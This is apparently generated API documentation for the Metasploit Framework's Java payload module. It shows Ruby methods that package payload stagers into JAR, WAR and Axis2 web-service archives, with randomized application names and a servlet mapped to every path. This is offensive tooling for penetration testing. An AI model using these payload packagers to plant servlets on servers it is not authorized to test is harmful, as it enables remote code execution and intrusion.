Module: Msf::Payload::Java

Included in:
BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Instance Method Summary collapse

Instance Method Details

#class_filesObject

Default to no extra class files



170
171
172
# File 'lib/msf/core/payload/java.rb', line 170

def class_files
  []
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String



34
35
36
# File 'lib/msf/core/payload/java.rb', line 34

def generate(opts={})
  generate_jar(opts).pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload's #stager_config method.

Parameters:

  • :app_name (Hash)

    a customizable set of options

Returns:

  • (Rex::Zip::Jar)


133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
# File 'lib/msf/core/payload/java.rb', line 133

def generate_axis2(opts={})
  raise if not respond_to? :stager_config

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    zip.add_file(path_parts.join('/'), contents)
  end

  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(:app_name => app_name)

  zip
end

#generate_default_stage(opts = {}) ⇒ Object



20
21
22
23
24
25
26
27
28
29
# File 'lib/msf/core/payload/java.rb', line 20

def generate_default_stage(opts={})
  stage = ''
  stage_class_files.each do |path|
    data = MetasploitPayloads.read('java', path)
    stage << [data.length, data].pack('NA*')
  end
  stage << [0].pack('N')

  stage
end

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload's #stager_config method.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :main_class (String)

    the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

  • :random (Boolean)

    Set to `true` to randomize the "metasploit" package name.

Returns:

  • (Rex::Zip::Jar)


48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# File 'lib/msf/core/payload/java.rb', line 48

def generate_jar(opts={})
  raise if not respond_to? :stager_config
  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    jar.add_file(path_parts.join('/'), contents)
  end

  jar.build_manifest(:main_class => main_class)

  jar
end

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

32-bit big endian length ][ first raw .class file

32-bit big endian length ][ Nth raw .class file
32-bit null


16
17
18
# File 'lib/msf/core/payload/java.rb', line 16

def generate_stage(opts={})
  generate_default_stage(opts)
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

  • opts (Hash) (defaults to: {})
  • :app_name (Hash)

    a customizable set of options



82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
# File 'lib/msf/core/payload/java.rb', line 82

def generate_war(opts={})
  raise if not respond_to? :stager_config
  zip = Rex::Zip::Jar.new

  web_xml = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  web_xml.gsub!(/NAME/, app_name)

  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    zip.add_file(path_parts.join('/'), contents)
  end

  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end

#stage_class_filesObject

Default to no extra stage class files



175
176
177
# File 'lib/msf/core/payload/java.rb', line 175

def stage_class_files
  []
end